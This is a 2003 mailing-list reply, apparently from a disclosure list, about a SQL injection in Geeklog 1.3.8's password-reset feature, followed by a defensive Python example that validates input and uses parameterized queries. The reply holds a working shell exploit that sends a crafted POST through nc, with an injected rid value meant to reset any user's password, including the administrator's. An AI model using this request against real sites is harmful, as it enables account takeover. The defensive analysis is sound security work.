Message-ID: <BBB8A153.1792%thomas@outcast-media.com>
From: thomas at outcast-media.com (Thomas Rogg)
Subject: Geeklog exploit
On 19.10.2003 at 18:21, Jouko Pynnonen wrote at jouko@....fi:
> ...
> The exploit uses the "forgot password" feature introduced in Geeklog
> 1.3.8. By constructing a certain kind of HTTP request, an attacker can
> change any user's Geeklog password, including the administrator
> password. This is because of an SQL injection problem. In users.php we have
> this kind of code (line about 750):
> ...
I tried out your exploit on a v1.3.8 Geeklog of mine, but the returned HTML
says: "Your request for a new password has expired. Please try again below."
Am I missing something? All I changed was to use HTTP/1.1 and to use
parameters for host and path:
-----
#!/bin/sh
echo "POST $2users.php HTTP/1.1
Host: $1
Connection: close
Content-length: 50
Content-type: application/x-www-form-urlencoded

mode=setnewpwd&passwd=new&uid=2&rid=3'+or+uid='1&
" | nc $1 80
-----
Thank you,
Thomas
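A defender-side check for the request shape discussed above, as an added example that is not part of this thread and not Geeklog's own code. It decodes the form body the way the server would (so the `+` in the payload becomes a space and the quote survives), refuses any `uid` or `rid` that is not a plain decimal integer, and looks the reset request up with a parameterized query so `rid` is bound as data rather than spliced into SQL. The field names come from the thread; the `reset_requests` table and the sample rows are constructed here, and the assumption that the ids are meant to be integers was not checked against the Geeklog source.

```python
"""Input validation and parameterized lookup for a "set new password" request.

Added example; not Geeklog code. Assumes (unchecked against Geeklog 1.3.8)
that uid and rid are meant to be plain decimal integers.
"""
import re
import sqlite3
from urllib.parse import parse_qs

_INT_ONLY = re.compile(r"[0-9]+")

# Constructed sample bodies: the payload quoted in the thread and a well-formed request.
INJECTED_BODY = "mode=setnewpwd&passwd=new&uid=2&rid=3'+or+uid='1&"
CLEAN_BODY = "mode=setnewpwd&passwd=new&uid=2&rid=3"


def decode_field(body, name):
    """Return the URL-decoded value of `name` from a form body, or None if absent."""
    fields = parse_qs(body, keep_blank_values=True)
    values = fields.get(name)
    return values[0] if values else None


def validate_setnewpwd(body):
    """Return (ok, reason). ok is True only when uid and rid are strictly decimal."""
    if decode_field(body, "mode") != "setnewpwd":
        return False, "mode is not setnewpwd"
    for name in ("uid", "rid"):
        value = decode_field(body, name)
        if value is None:
            return False, f"missing {name}"
        if not _INT_ONLY.fullmatch(value):
            # The thread's payload lands here: "3' or uid='1" is not an integer.
            return False, f"{name} is not a decimal integer: {value!r}"
    return True, "ok"


def build_sample_db():
    """Constructed in-memory table of pending reset requests (uid, rid)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE reset_requests (uid INTEGER, rid TEXT)")
    conn.executemany("INSERT INTO reset_requests VALUES (?, ?)", [(1, "9"), (2, "3")])
    conn.commit()
    return conn


def lookup_reset_request(conn, uid, rid):
    """Parameterized lookup: the driver binds rid as a value, never as SQL text.

    Returns the matching uid, or None when no pending request matches.
    """
    row = conn.execute(
        "SELECT uid FROM reset_requests WHERE uid = ? AND rid = ?", (uid, rid)
    ).fetchone()
    return row[0] if row else None


def handle_setnewpwd(conn, body):
    """Validate first, then look up; returns the uid whose password may change, or None."""
    ok, _reason = validate_setnewpwd(body)
    if not ok:
        return None
    return lookup_reset_request(conn, int(decode_field(body, "uid")), decode_field(body, "rid"))


if __name__ == "__main__":
    db = build_sample_db()
    print("decoded rid from payload:", decode_field(INJECTED_BODY, "rid"))
    print("injected body:", validate_setnewpwd(INJECTED_BODY), "->", handle_setnewpwd(db, INJECTED_BODY))
    print("clean body:", validate_setnewpwd(CLEAN_BODY), "->", handle_setnewpwd(db, CLEAN_BODY))
```

Either layer alone stops the quoted payload: the integer check rejects it before any query runs, and even if it were passed straight to `lookup_reset_request`, the bound parameter compares the whole string `3' or uid='1` against the stored `rid` and matches nothing.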